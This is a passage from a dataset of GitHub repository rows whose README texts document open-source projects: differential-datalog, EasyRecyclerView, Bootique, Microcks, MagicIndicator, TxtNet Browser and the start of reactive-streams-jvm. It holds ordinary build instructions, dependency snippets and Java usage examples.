functionality: - -``` -stack test --ta '-p path' -``` - -**Note:** this takes a few minutes - -You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md). 
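For a first taste of the language before working through the tutorial, here is the classic graph-reachability program (a sketch in the spirit of the tutorial; relation and variable names are illustrative):

```
input relation Edge(src: string, dst: string)
output relation Path(src: string, dst: string)

// Every direct edge is a path.
Path(x, y) :- Edge(x, y).
// Extend a known path by one more edge. DDlog maintains Path
// incrementally as Edge facts are inserted or deleted.
Path(x, z) :- Path(x, y), Edge(y, z).
```

Feeding updates to `Edge` causes DDlog to emit only the corresponding changes to `Path`, rather than recomputing the full transitive closure.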
- -### vim syntax highlighting - -The easiest way to enable differential datalog syntax highlighting for `.dl` files in Vim is by -creating a symlink from `/tools/vim/syntax/dl.vim` into `~/.vim/syntax/`. - -If you are using a plugin manager you may be able to directly consume the file from the upstream -repository as well. In the case of [`Vundle`](https://github.com/VundleVim/Vundle.vim), for example, -configuration could look as follows: - -```vim -call vundle#begin('~/.config/nvim/bundle') -... -Plugin 'vmware/differential-datalog', {'rtp': 'tools/vim'} <---- relevant line -... -call vundle#end() -``` - -## Debugging with GHCi - -To run the test suite with the GHCi debugger: - -``` -stack ghci --ghci-options -isrc --ghci-options -itest differential-datalog:differential-datalog-test -``` - -and type `do main` in the command prompt. - -## Building with profiling info enabled - -``` -stack clean -``` - -followed by - -``` -stack build --profile -``` - -or - -``` -stack test --profile -``` -",0 -Jude95/EasyRecyclerView,"ArrayAdapter,pull to refresh,auto load more,Header/Footer,EmptyView,ProgressView,ErrorView",2015-07-18T13:11:48Z,,"# EasyRecyclerView -[中文](https://github.com/Jude95/EasyRecyclerView/blob/master/README_ch.md) | [English](https://github.com/Jude95/EasyRecyclerView/blob/master/README.md) - -Encapsulate many API about RecyclerView into the library,such as arrayAdapter,pull to refresh,auto load more,no more and error in the end,header&footer. -The library uses a new usage of ViewHolder,decoupling the ViewHolder and Adapter. -Adapter will do less work,adapter only direct the ViewHolder,if you use MVP,you can put adapter into presenter.ViewHolder only show the item,then you can use one ViewHolder for many Adapter. -Part of the code modified from [Malinskiy/SuperRecyclerView](https://github.com/Malinskiy/SuperRecyclerView),make more functions handed by Adapter. 
- - -# Dependency -```groovy -compile 'com.jude:easyrecyclerview:4.4.2' -``` - -# ScreenShot -![recycler.gif](recycler3.gif) -# Usage -## EasyRecyclerView -```xml - -``` - -**Attention** EasyRecyclerView is not a RecyclerView just contain a RecyclerView.use 'getRecyclerView()' to get the RecyclerView; - -**EmptyView&LoadingView&ErrorView** -xml: -```xml -app:layout_empty=""@layout/view_empty"" -app:layout_progress=""@layout/view_progress"" -app:layout_error=""@layout/view_error"" -``` - -code: -```java -void setEmptyView(View emptyView) -void setProgressView(View progressView) -void setErrorView(View errorView) -``` - -then you can show it by this whenever: - -```java -void showEmpty() -void showProgress() -void showError() -void showRecycler() -``` - -**scrollToPosition** -```java -void scrollToPosition(int position); // such as scroll to top -``` - -**control the pullToRefresh** -```java -void setRefreshing(boolean isRefreshing); -void setRefreshing(final boolean isRefreshing, final boolean isCallback); //second params is callback immediately -``` - - -##RecyclerArrayAdapter -there is no relation between RecyclerArrayAdapter and EasyRecyclerView.you can user any Adapter for the EasyRecyclerView,and use the RecyclerArrayAdapter for any RecyclerView. - -**Data Manage** -```java -void add(T object); -void addAll(Collection collection); -void addAll(T ... 
items); -void insert(T object, int index); -void update(T object, int index); -void remove(T object); -void clear(); -void sort(Comparator comparator); -``` - -**Header&Footer** -```java -void addHeader(ItemView view) -void addFooter(ItemView view) -``` - -ItemView is not a view but a view creator; - -```java -public interface ItemView { - View onCreateView(ViewGroup parent); - void onBindView(View itemView); -} -``` - -The onCreateView and onBindView correspond the callback in RecyclerView's Adapter,so adapter will call `onCreateView` once and `onBindView` more than once; -It recommend that add the ItemView to Adapter after the data is loaded,initialization View in onCreateView and nothing in onBindView. - - Header and Footer support `LinearLayoutManager`,`GridLayoutManager`,`StaggeredGridLayoutManager`. - In `GridLayoutManager` you must add this: -```java -//make adapter obtain a LookUp for LayoutManager,param is maxSpan。 -gridLayoutManager.setSpanSizeLookup(adapter.obtainGridSpanSizeLookUp(2)); -``` - -**OnItemClickListener&OnItemLongClickListener** -```java -adapter.setOnItemClickListener(new RecyclerArrayAdapter.OnItemClickListener() { - @Override - public void onItemClick(int position) { - //position not contain Header - } -}); - -adapter.setOnItemLongClickListener(new RecyclerArrayAdapter.OnItemLongClickListener() { - @Override - public boolean onItemLongClick(int position) { - return true; - } -}); -``` -equal 'itemview.setOnClickListener()' in ViewHolder. 
-If you set a listener after the RecyclerView has been laid out, you should call `notifyDataSetChanged()`.
-
-### The APIs below are implemented by adding a Footer.
-
-**LoadMore**
-```java
-void setMore(final int res,OnMoreListener listener);
-void setMore(final View view,OnMoreListener listener);
-```
-Attention: when you add null, or the data you add has length 0, it will finish LoadMore and show NoMore;
-you can also show NoMore manually with `adapter.stopMore();`
-
-**LoadError**
-```java
-void setError(final int res,OnErrorListener listener)
-void setError(final View view,OnErrorListener listener)
-```
-Use `adapter.pauseMore()` to show the Error view when your loading throws an error.
-If you add data while the Error view is showing, it will resume loading more.
-When the ErrorView is displayed on screen again, it will also resume loading more and call back the OnLoadMoreListener (retry).
-With `adapter.resumeMore()` you can resume loading more manually; it calls back the OnLoadMoreListener immediately.
-You can put `resumeMore()` into the OnClickListener of the ErrorView to implement click-to-retry.
-
-**NoMore**
-```java
-void setNoMore(final int res,OnNoMoreListener listener)
-void setNoMore(final View view,OnNoMoreListener listener)
-```
-When loading is finished (null or empty data was added, or it was stopped manually), it will be shown at the end.
-
-## BaseViewHolder\<M\>
-It decouples the ViewHolder from the Adapter: the Adapter creates the ViewHolder, and the ViewHolder inflates the view. 
-Example:
-
-```java
-public class PersonViewHolder extends BaseViewHolder<Person> {
-    private TextView mTv_name;
-    private SimpleDraweeView mImg_face;
-    private TextView mTv_sign;
-
-
-    public PersonViewHolder(ViewGroup parent) {
-        super(parent,R.layout.item_person);
-        mTv_name = $(R.id.person_name);
-        mTv_sign = $(R.id.person_sign);
-        mImg_face = $(R.id.person_face);
-    }
-
-    @Override
-    public void setData(final Person person){
-        mTv_name.setText(person.getName());
-        mTv_sign.setText(person.getSign());
-        mImg_face.setImageURI(Uri.parse(person.getFace()));
-    }
-}
-
------------------------------------------------------------------------
-
-public class PersonAdapter extends RecyclerArrayAdapter<Person> {
-    public PersonAdapter(Context context) {
-        super(context);
-    }
-
-    @Override
-    public BaseViewHolder OnCreateViewHolder(ViewGroup parent, int viewType) {
-        return new PersonViewHolder(parent);
-    }
-}
-```
-
-## Decoration
-Three commonly used decorations are provided for you.
-**DividerDecoration**
-Usually used with LinearLayoutManager to add a divider between items.
-```java
-DividerDecoration itemDecoration = new DividerDecoration(Color.GRAY, Util.dip2px(this,0.5f), Util.dip2px(this,72),0); // color, height, paddingLeft, paddingRight
-itemDecoration.setDrawLastItem(true); // sometimes you don't want to draw the divider for the last item; default is true
-itemDecoration.setDrawHeaderFooter(false); // whether to draw the divider for headers and footers; default is false
-recyclerView.addItemDecoration(itemDecoration);
-```
-Here is the demo:
-
-
-
-**SpaceDecoration**
-Usually used with GridLayoutManager and StaggeredGridLayoutManager to add space between items.
-```java
-SpaceDecoration itemDecoration = new SpaceDecoration((int) Utils.convertDpToPixel(8,this)); // the param is the space height
-itemDecoration.setPaddingEdgeSide(true); // whether to add space on the left and right edges; default is true
-itemDecoration.setPaddingStart(true); // whether to add top space for the first line of items (excluding headers); default is true 
-itemDecoration.setPaddingHeaderFooter(false); // whether to add space for headers and footers; default is false
-recyclerView.addItemDecoration(itemDecoration);
-```
-Here is the demo:
-
-
-**StickyHeaderDecoration**
-Groups the items and adds a GroupHeaderView for each group. StickyHeaderAdapter is used the same way as RecyclerView.Adapter.
-This part is adapted from [edubarr/header-decor](https://github.com/edubarr/header-decor).
-```java
-StickyHeaderDecoration decoration = new StickyHeaderDecoration(new StickyHeaderAdapter(this));
-decoration.setIncludeHeader(false);
-recyclerView.addItemDecoration(decoration);
-```
-For example:
-
-
-**For details, see the demo.**
-
-License
--------
-
-    Copyright 2015 Jude
-
-    Licensed under the Apache License, Version 2.0 (the ""License"");
-    you may not use this file except in compliance with the License.
-    You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-    Unless required by applicable law or agreed to in writing, software
-    distributed under the License is distributed on an ""AS IS"" BASIS,
-    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-    See the License for the specific language governing permissions and
-    limitations under the License.
-
-
-
-
-
-",0
-bootique/bootique,Bootique is a minimally opinionated platform for modern runnable Java apps.,2015-12-10T14:45:15Z,,"
-
-[![build test deploy](https://github.com/bootique/bootique/workflows/build%20test%20deploy/badge.svg)](https://github.com/bootique/bootique/actions)
-[![Maven Central](https://img.shields.io/maven-central/v/io.bootique/bootique.svg?colorB=brightgreen)](https://search.maven.org/artifact/io.bootique/bootique)
-
-Bootique is a [minimally opinionated](https://medium.com/@andrus_a/bootique-a-minimally-opinionated-platform-for-modern-java-apps-644194c23872#.odwmsbnbh)
-Java launcher and integration technology. It is intended for building container-less runnable Java applications. 
-With Bootique you can create REST services, webapps, jobs, DB migration tasks, etc. and run them as if they were
-simple commands. No JavaEE container required! Among other things Bootique is an ideal platform for
-Java [microservices](http://martinfowler.com/articles/microservices.html), as it allows you to create a fully-functional
-app with minimal setup.
-
-Each Bootique app is a collection of modules interacting with each other via dependency injection. This GitHub project
-provides Bootique core. Bootique team also develops a number of important modules. A full list is available
-[here](http://bootique.io/docs/).
-
-## Quick Links
-
-* [WebSite](https://bootique.io)
-* [Getting Started](https://bootique.io/docs/2.x/getting-started/)
-* [Docs](https://bootique.io/docs/) - documentation collection for Bootique core and all standard
-  modules.
-
-## Support
-
-You have two options:
-* [Open an issue](https://github.com/bootique/bootique/issues) on GitHub with a label of ""help wanted"" or ""question""
-  (or ""bug"" if you think you found a bug).
-* Post a question on the [Bootique forum](https://groups.google.com/forum/#!forum/bootique-user).
-
-## TL;DR
-
-For the impatient, here is how to get started with Bootique:
-
-* Declare the official module collection:
-```xml
-<dependencyManagement>
-    <dependencies>
-        <dependency>
-            <groupId>io.bootique.bom</groupId>
-            <artifactId>bootique-bom</artifactId>
-            <version>3.0-M4</version>
-            <type>pom</type>
-            <scope>import</scope>
-        </dependency>
-    </dependencies>
-</dependencyManagement>
-```
-* Include the modules that you need:
-```xml
-<dependencies>
-    <dependency>
-        <groupId>io.bootique.jersey</groupId>
-        <artifactId>bootique-jersey</artifactId>
-    </dependency>
-    <dependency>
-        <groupId>io.bootique.logback</groupId>
-        <artifactId>bootique-logback</artifactId>
-    </dependency>
-</dependencies>
-```
-* Write your app:
-```java
-package com.foo;
-
-import io.bootique.Bootique;
-
-public class Application {
-    public static void main(String[] args) {
-        Bootique
-            .app(args)
-            .autoLoadModules()
-            .exec()
-            .exit();
-    }
-}
-```
-It has a ```main()``` method, so you can run it! 
- -*For a more detailed tutorial proceed to [this link](https://bootique.io/docs/2.x/getting-started/).* - -## Upgrading - -See the ""maven-central"" badge above for the current production version of ```bootique-bom```. -When upgrading, don't forget to check [upgrade notes](https://github.com/bootique/bootique/blob/master/UPGRADE.md) -specific to your version. -",0 -microcks/microcks,Kubernetes native tool for mocking and testing API and micro-services. Microcks is a Cloud Native Computing Foundation sandbox project 🚀,2015-02-23T15:46:09Z,," - -[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions) -[![Container](https://img.shields.io/badge/dynamic/json?color=blueviolet&logo=docker&style=for-the-badge&label=Quay.io&query=tags[0].name&url=https://quay.io/api/v1/repository/microcks/microcks/tag/?limit=10&page=1&onlyActiveTags=true)](https://quay.io/repository/microcks/microcks?tab=tags) -[![Version](https://img.shields.io/maven-central/v/io.github.microcks/microcks?color=blue&style=for-the-badge)]((https://search.maven.org/artifact/io.github.microcks/microcks)) -[![License](https://img.shields.io/github/license/microcks/microcks?style=for-the-badge&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0) -[![Project Chat](https://img.shields.io/badge/discord-microcks-pink.svg?color=7289da&style=for-the-badge&logo=discord)](https://microcks.io/discord-invite/) - - -# Microcks - Kubernetes native tool for API Mocking & Testing - -Microcks is a platform for turning your API and microservices assets - *OpenAPI specs*, *AsyncAPI specs*, *gRPC protobuf*, *GraphQL schema*, *Postman collections*, *SoapUI projects* - into live mocks in seconds. - -It also reuses these assets for running compliance and non-regression tests against your API implementation. 
We provide integrations with *Jenkins*, *GitHub Actions*, *Tekton* and many others through a simple CLI. - -## Getting Started - -* [Documentation](https://microcks.io/documentation/getting-started/) - -To get involved with our community, please make sure you are familiar with the project's [Code of Conduct](./CODE_OF_CONDUCT.md). - -## Build Status - -The current development version is `1.9.1-SNAPSHOT`. [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?branch=1.9.x&logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions) - -#### Sonarcloud Quality metrics - -[![Code Smells](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=code_smells)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Reliability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=reliability_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Bugs](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=bugs)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Coverage](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=coverage)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=security_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) -[![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) - -## Versions - -Here are the naming conventions we're using for current releases, ongoing development 
maintenance activities. - -| Status | Version | Branch | Container images tags | -| ----------- |------------------|----------|----------------------------------| -| Stable | `1.9.0` | `master` | `1.9.0`, `1.9.0-fix-2`, `latest` | -| Dev | `1.9.1-SNAPSHOT` | `1.9.x` | `nightly` | -| Maintenance | `1.8.2-SNAPSHOT` | `1.8.x` | `maintenance` | - - -## How to build Microcks - -The build instructions are available in the [contribution guide](CONTRIBUTING.md). - -## Thanks to community! - -[![Stargazers repo roster for @microcks/microcks](http://reporoster.com/stars/microcks/microcks)](http://github.com/microcks/microcks/stargazers) -[![Forkers repo roster for @microcks/microcks](http://reporoster.com/forks/microcks/microcks)](http://github.com/microcks/microcks/network/members) -",0 -hackware1993/MagicIndicator,"A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip —— 强大、可定制、易扩展的 ViewPager 指示器框架。是ViewPagerIndicator、TabLayout、PagerSlidingTabStrip的最佳替代品。支持角标,更支持在非ViewPager场景下使用(使用hide()、show()切换Fragment或使用setVisibility切换FrameLayout里的View等),http://www.jianshu.com/p/f3022211821c",2016-06-26T08:20:43Z,,"# MagicIndicator - -A powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip. - -[Flutter_ConstraintLayout](https://github.com/hackware1993/Flutter_ConstraintLayout) Another very good open source project of mine. 
-
-**I have developed the world's fastest general purpose sorting algorithm, which is on average 3 times faster than Quicksort and up to 20 times faster**, [ChenSort](https://github.com/hackware1993/ChenSort)
-
-[![](https://jitpack.io/v/hackware1993/MagicIndicator.svg)](https://jitpack.io/#hackware1993/MagicIndicator)
-[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MagicIndicator-green.svg?style=true)](https://android-arsenal.com/details/1/4252)
-[![Codewake](https://www.codewake.com/badges/ask_question.svg)](https://www.codewake.com/p/magicindicator)
-
-![magicindicator.gif](https://github.com/hackware1993/MagicIndicator/blob/main/magicindicator.gif)
-
-# Usage
-
-In a few simple steps you can integrate **MagicIndicator**:
-
-1. check out **MagicIndicator**, which contains the source code and a demo
-2. import the module **magicindicator** and add the dependency:
-
-   ```groovy
-   implementation project(':magicindicator')
-   ```
-
-   **or**
-
-   ```groovy
-   repositories {
-       ...
-       maven {
-           url ""https://jitpack.io""
-       }
-   }
-
-   dependencies {
-       ...
-       implementation 'com.github.hackware1993:MagicIndicator:1.6.0' // for support lib
-       implementation 'com.github.hackware1993:MagicIndicator:1.7.0' // for androidx
-   }
-   ```
-
-3. add **MagicIndicator** to your layout xml:
-
-   ```xml
-
-   ```
-
-4. find **MagicIndicator** in code and initialize it:
-
-   ```java
-   MagicIndicator magicIndicator = (MagicIndicator) findViewById(R.id.magic_indicator);
-   CommonNavigator commonNavigator = new CommonNavigator(this);
-   commonNavigator.setAdapter(new CommonNavigatorAdapter() {
-
-       @Override
-       public int getCount() {
-           return mTitleDataList == null ? 
0 : mTitleDataList.size();
-       }
-
-       @Override
-       public IPagerTitleView getTitleView(Context context, final int index) {
-           ColorTransitionPagerTitleView colorTransitionPagerTitleView = new ColorTransitionPagerTitleView(context);
-           colorTransitionPagerTitleView.setNormalColor(Color.GRAY);
-           colorTransitionPagerTitleView.setSelectedColor(Color.BLACK);
-           colorTransitionPagerTitleView.setText(mTitleDataList.get(index));
-           colorTransitionPagerTitleView.setOnClickListener(new View.OnClickListener() {
-               @Override
-               public void onClick(View view) {
-                   mViewPager.setCurrentItem(index);
-               }
-           });
-           return colorTransitionPagerTitleView;
-       }
-
-       @Override
-       public IPagerIndicator getIndicator(Context context) {
-           LinePagerIndicator indicator = new LinePagerIndicator(context);
-           indicator.setMode(LinePagerIndicator.MODE_WRAP_CONTENT);
-           return indicator;
-       }
-   });
-   magicIndicator.setNavigator(commonNavigator);
-   ```
-
-5. work with a ViewPager:
-
-   ```java
-   ViewPagerHelper.bind(magicIndicator, mViewPager);
-   ```
-
-   **or**
-
-   work with a Fragment container (switching Fragments via hide()/show()):
-   ```java
-   mFragmentContainerHelper = new FragmentContainerHelper(magicIndicator);
-
-   // ...
-
-   mFragmentContainerHelper.handlePageSelected(pageIndex); // invoke when switching Fragments
-   ```
-
-# Extend
-
-**MagicIndicator** can be easily extended:
-
-1. implement **IPagerTitleView** to customize a tab:
-
-   ```java
-   public class MyPagerTitleView extends View implements IPagerTitleView {
-
-       public MyPagerTitleView(Context context) {
-           super(context);
-       }
-
-       @Override
-       public void onLeave(int index, int totalCount, float leavePercent, boolean leftToRight) {
-       }
-
-       @Override
-       public void onEnter(int index, int totalCount, float enterPercent, boolean leftToRight) {
-       }
-
-       @Override
-       public void onSelected(int index, int totalCount) {
-       }
-
-       @Override
-       public void onDeselected(int index, int totalCount) {
-       }
-   }
-   ```
-
-2. 
implement **IPagerIndicator** to customize the indicator:
-
-   ```java
-   public class MyPagerIndicator extends View implements IPagerIndicator {
-
-       public MyPagerIndicator(Context context) {
-           super(context);
-       }
-
-       @Override
-       public void onPageSelected(int position) {
-       }
-
-       @Override
-       public void onPageScrolled(int position, float positionOffset, int positionOffsetPixels) {
-       }
-
-       @Override
-       public void onPageScrollStateChanged(int state) {
-       }
-
-       @Override
-       public void onPositionDataProvide(List<PositionData> dataList) {
-       }
-   }
-   ```
-
-3. use **CommonPagerTitleView** to load a custom layout xml.
-
-Now, enjoy yourself!
-
-See extensions in [*app/src/main/java/net/lucode/hackware/magicindicatordemo/ext*](https://github.com/hackware1993/MagicIndicator/tree/master/app/src/main/java/net/lucode/hackware/magicindicatordemo/ext); more extensions are being added...
-
-# Who developed?
-
-hackware1993@gmail.com
-
-cfb1993@163.com
-
-Q&A
-
-An intermittent perfectionist.
-
-Visit [My Blog](http://hackware.lucode.net) for more articles about MagicIndicator.
-
-Subscribe to my WeChat official account to get the latest MagicIndicator news in time. I will also share some high-quality, distinctive and thoughtful Flutter and Android technical articles there.
-
-![official_account.webp](https://github.com/hackware1993/weiV/blob/master/official_account.webp?raw=true)
-
-# License
-
-   ```
-   MIT License
-
-   Copyright (c) 2016 hackware1993
-
-   Permission is hereby granted, free of charge, to any person obtaining a copy
-   of this software and associated documentation files (the ""Software""), to deal
-   in the Software without restriction, including without limitation the rights
-   to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-   copies of the Software, and to permit persons to whom the Software is
-   furnished to do so, subject to the following conditions:
-
-   The above copyright notice and this permission notice shall be included in all
-   copies or substantial portions of the Software. 
- - THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE - SOFTWARE. - ``` - -# More - -Have seen here, give a star?(都看到这儿了,何不给个...,哎,别走啊,star还没...) -",0 -lukeaschenbrenner/TxtNet-Browser,An app that lets you browse the web over SMS,2022-03-22T22:50:34Z,,"# TxtNet Browser -### Browse the Web over SMS, no WiFi or Mobile Data required! -

-
-> **⏸️ Development of this project is currently on hiatus due to other ongoing commitments. However, fixes and improvements are planned when development continues in Q1 2024! ⏸️**
-
-TxtNet Browser is an Android app that allows anyone around the world to browse the web without a mobile data connection! It uses SMS as a medium for transmitting HTTP requests to a server, where a pre-parsed HTML response is compressed using Google's [Brotli](https://github.com/google/brotli) compression algorithm and encoded using a custom Base-114 encoding format (based on [Basest](https://github.com/saxbophone/basest-python)).
-
-In addition, any user can act as a server using their own phone's primary phone number and a Wi-Fi/data connection at the press of a button, allowing for peer-to-peer distributed networks.
-
-## Download
-### See the **[releases page](https://github.com/lukeaschenbrenner/TxtNet-Browser/releases)** for an APK download of the TxtNet Browser client. A Google Play release is coming soon.
-TxtNet Browser is currently compatible with Android 4.4-13+.
-
-## Running Server Instances (uptime not guaranteed)
-| Country | Phone Number | Notes |
-| :--- | :----: | :--- |
-| United States | +1(913)203-2719 | Supports SMS to all +1 (US/Canada) numbers in addition to [these countries](https://github.com/lukeaschenbrenner/TxtNet-Browser/issues/2#issuecomment-1510506701) |
-| | | |
-
-Let me know if you are interested in hosting a server instance for your area!
-
-> ⚠️**Please note**: All web traffic should be considered unencrypted, as all requests are made over SMS and received in plaintext by the server!
-
-## How it works (client)
-
-This app uses a permission that allows a broadcast receiver to receive and parse incoming SMS messages without the need for the app to be registered as the user's default messaging app. 
While granting an app SMS permissions poses a security concern, the code for this app is open source, and all code involving the use of internet permissions is compartmentalized in the server module. This ensures that unless the app is set up to be a server, no internet traffic is transmitted. In addition, as the client, SMS messages are only programmatically sent to and received from a registered server phone number.
-The app communicates with a ""server phone number"", which is a phone number controlled by a ""server host"" that communicates directly over SMS using Android's SMS APIs. Each URL request is sent to the server encoded in a custom base 114. Usually this only requires 1 SMS, but just in case, each message is prepended with an order specifier. When the server receives a request, it uses an Android WebView component to programmatically request the website in a manner that simulates a regular request, to avoid restrictions some services (such as Cloudflare) place on HTTP clients. By doing this, any JavaScript can also execute on the website, allowing content to be dynamically loaded into the HTML if needed. Once the page is loaded, only the HTML is transferred back to the recipient device. The HTML is stripped of unnecessary tags and attributes, compressed into raw bytes, and then encoded. Once encoded, the messages are split into numbered 160-character segments (maximizing the [GSM-7 standard](https://en.wikipedia.org/wiki/GSM_03.38) SMS size) and sent to the client app for parsing and display.
-
-Side note: Compression savings have been estimated to average 20% using Brotli, but oftentimes it can save much more! For example, the website `example.com` in stripped HTML is 285 characters, but requires only 2 SMS messages (189 characters) to receive. Even including the 225% overhead in data transmission, it is still more efficient!
-
-#### Why encode the HTML in the first place? 
-SMS was created in 1984 to utilize the extra bytes from the data channels in phone signalling. It was originally conceived to support only 128 characters in a 7-bit alphabet. When further characters were required to support a subset of the Unicode character set, a new standard called UCS-2 was created. Still limited by the 140 bytes available, UCS-2 supports more characters (many of which show up in HTML documents) but limits SMS sizes to 70 characters per SMS. By encoding all data in GSM-7, more data can be sent per SMS message than by sending the raw HTML over SMS. It is possible that it may be even more efficient to create an encoding system using all the characters available in UCS-2, but this limits compatibility and is out of the scope of the project.
-
-## Server Hosting
-TxtNet Browser has been rewritten to include a built-in server hosting option inside the app. Instead of the now-deprecated Python server using a paid SMS API, any user can now act as a server host, allowing for distributed communication.
-To enable the background service, tap on the overflow menu and select ""TxtNet Server Hosting"". Once the necessary permissions are granted, you can press the ""Start Service"" toggle to initialize a background service.
-TxtNet Server uses your primary mobile number, associated with the active carrier subscription SIM, as a number that others can add and connect to.
-Please note that this feature is still in an early stage of development and likely has many issues. Please submit issue reports for any problems you encounter.
-For Android 4.4-6.0, you will need to run adb commands one time as specified in the app. For Android 6.0-10.0, you may also use Shizuku, but a PC will still be required once. For Android 11+, no PC is required to activate the server using [Shizuku](https://shizuku.rikka.app/guide/setup/). 
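Returning to the encoding discussion above, the GSM-7 vs. UCS-2 segment arithmetic can be sketched in a few lines. This is a hypothetical illustration only: the `SmsSegments` class is not part of the app, and real multipart SMS reserves a few characters per segment for concatenation headers, which this ignores.

```java
// Sketch of the segment arithmetic from the encoding discussion above.
// Assumes the single-message limits quoted in this README:
// 160 characters per SMS for GSM-7, 70 characters per SMS for UCS-2.
public class SmsSegments {
    static int gsm7Segments(int chars) { return (chars + 159) / 160; }
    static int ucs2Segments(int chars) { return (chars + 69) / 70; }

    public static void main(String[] args) {
        // The example.com case above: 285 characters of stripped HTML compress
        // and encode down to 189 GSM-7 characters, so only 2 messages are needed...
        System.out.println(gsm7Segments(189)); // 2
        // ...while 189 characters sent as UCS-2 would take 3 messages, and the
        // uncompressed 285 characters would take 5 if any character forced UCS-2.
        System.out.println(ucs2Segments(189)); // 3
        System.out.println(ucs2Segments(285)); // 5
    }
}
```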
-
-
-##### Desktop Server Installation (Deprecated)
-
- The current source code is pointed at my own server, using a Twilio API with credits I have purchased. If you would like to run your own server, follow the instructions below:
-1. Register for an account at [Twilio](https://twilio.com/), purchase a toll-free number with SMS capability, and purchase credits. (This project will not work with Twilio free accounts)
-2. Create a Twilio application for the number.
-3. Sign up for an [ngrok](http://ngrok.com/) account and download the ngrok application
-4. Open the ngrok directory and run this command: `./ngrok tcp 5000`
-5. Visit the [active numbers](https://console.twilio.com/US1/develop/phone-numbers/manage/incoming) page and add the ngrok url to the ""A Message Comes In"" section after selecting ""webhook"". For example: ""https://xyz.ngrok.io/receive_sms""
-6. Download the TxtNet Browser [server script](https://github.com/lukeaschenbrenner/TxtNet-Browser/blob/master/SMS_Server_Twilio.py) and install all the required modules using ""pip install x""
-7. Add your Twilio API ID and Key to your environment variables, and run the script! `python3 ./SMS_Server_Twilio.py`
-8. In the TxtNet Browser app, press the three dots and press ""Change Server Phone Number"". Enter the phone number you purchased from Twilio and press OK!
-
-
-## FAQ/Troubleshooting
-
-Bugs:
-- Many carriers are unnecessarily rate limiting incoming text messages, so a page may look as though it ""stalled"" while loading on large pages. As of now the only way to fix this is to wait!
-- In congested networks, it's possible for a mobile carrier to drop one or more SMS messages before they are received by the client. Currently, the app has no logic to mitigate this issue, so any websites that have stalled for a significant amount of time should be requested again.
-- In Android 12 (or possibly a new version of Google Messages?), there is a new and ""improved"" message blocking feature. 
This results in no SMS messages getting through when a number is blocked, which makes the blocking feature break TxtNet Browser entirely! To get around this ""feature"", instead of blocking messages you can silence message notifications from the server phone number.
-
-
-
-## Screenshots (TxtNet 1.0)
-
-
-
-
-
-
-
-
-
-
-
- -##### Demo (TxtNet 1.0) - -https://user-images.githubusercontent.com/5207700/191133921-ee39c87a-c817-4dde-b522-cb52e7bf793b.mp4 - -> Demo video shown above - - -## Development - -### 🚧 **If you are skilled in Android UI design, your help would be greatly appreciated!** 🚧 A consistent theme and dark mode would be great additions to this app. -Feel free to submit pull requests! I am a second-year CS student with basic knowledge of Android Development and Server Development, and greatly appreciate help and support from the community. - -## Future Impact -My long-term goal with this project is to eventually reach communities where such a service would be practically useful, which may include: -- Those in countries with a low median income and prohibitively expensive data plans -- Those who live under oppressive governments, with near impenetrable internet censorship - -If you think you might be able to help funding a local country code phone number or server, or have any other ideas, please get in contact with the email in my profile description! - -## License - -GPLv3 - See LICENSE.md - -## Credits - -Thank you to everyone who has contributed to the libraries used by this app, especially Brotli and Basest. Special thanks goes to [Coldsauce](https://github.com/ColdSauce), whose original project [Cosmos Browser](https://github.com/ColdSauce/CosmosBrowserAndroid) was the original inspiration for this project! -My original reply to his Hacker News comment is [here](https://news.ycombinator.com/item?id=30685223#30687202). -In addition, I would like to thank [Zachary Wander](https://www.xda-developers.com/implementing-shizuku/) from XDA for their excellent Shizuku implementation tutorial and [Aayush Atharva](https://github.com/hyperxpro/Brotli4j/) for the amazing foundation they created with Brotli4J, allowing for a streamlined forking process to create the library BrotliDroid used in this app. 
-",0
-reactive-streams/reactive-streams-jvm,Reactive Streams Specification for the JVM,2014-02-28T13:16:15Z,,"# Reactive Streams #
-
-The purpose of Reactive Streams is to provide a standard for asynchronous stream processing with non-blocking backpressure.
-
-The latest release is available on Maven Central as
-
-```xml
-<dependency>
-  <groupId>org.reactivestreams</groupId>
-  <artifactId>reactive-streams</artifactId>
-  <version>1.0.4</version>
-</dependency>
-<dependency>
-  <groupId>org.reactivestreams</groupId>
